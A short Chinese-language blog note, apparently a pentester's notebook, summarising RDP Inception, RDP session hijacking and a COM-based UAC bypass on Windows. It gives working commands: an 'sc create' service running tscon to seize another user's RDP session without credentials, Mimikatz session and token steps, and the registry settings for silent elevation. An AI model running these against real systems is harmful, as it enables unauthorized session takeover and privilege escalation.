RDP Inception+RDP hijack+Bypass UAC(关防火墙、复制文件、执行文件)

Nov 02, 2020
  1. RDPInception:

*要求用户在连RDP时映射C盘 默认条件不满足
即RDP client c:\ -> RDP server \tsclient\c

未来可以研究 RDP clipboard/printer RCE来更广泛实现这种攻击

https://www.anquanke.com/post/id/101525

2.  RDP Hijack

query user

方法1 在system权限下执行
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#0"
net start sesshijack
不需要凭据即可切换到目标桌面
方法2 使用Mimikatz
ts::sessions
privilege::debug //system 权限
ts::remote /id:1
token::elevate //切换桌面

https://www.anquanke.com/post/id/101525

3. Bypass UAC

通过学习官方文档,发现COM Elevation Moniker的使用对COM组件有如下要求:

  1. 该COM组件被注册
  2. 注册位置在HKEY_LOCAL_MACHINE下,也就是说,需要以管理员权限注册这个COM组件才可以
  3. 注册表HKEY_LOCAL_MACHINE\Software\Classes\CLSID下需要指定三项键值
    {CLSID}, LocalizedString(REG_EXPAND_SZ):displayName
    {CLSID}/Elevation,IconReference(REG_EXPAND_SZ):applicationIcon
    {CLSID}/Elevation,Enabled(REG_DWORD):1

复制文件COM:IFileOperation

结论:只要以(或者模拟成)可信的进程(如explorer.exe、powershell.exe),加载高权限的COM组件不会弹出UAC的对话框。

https://github.com/3gstudent/Use-COM-objects-to-bypass-UAC

Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.
京ICP备18053813号-1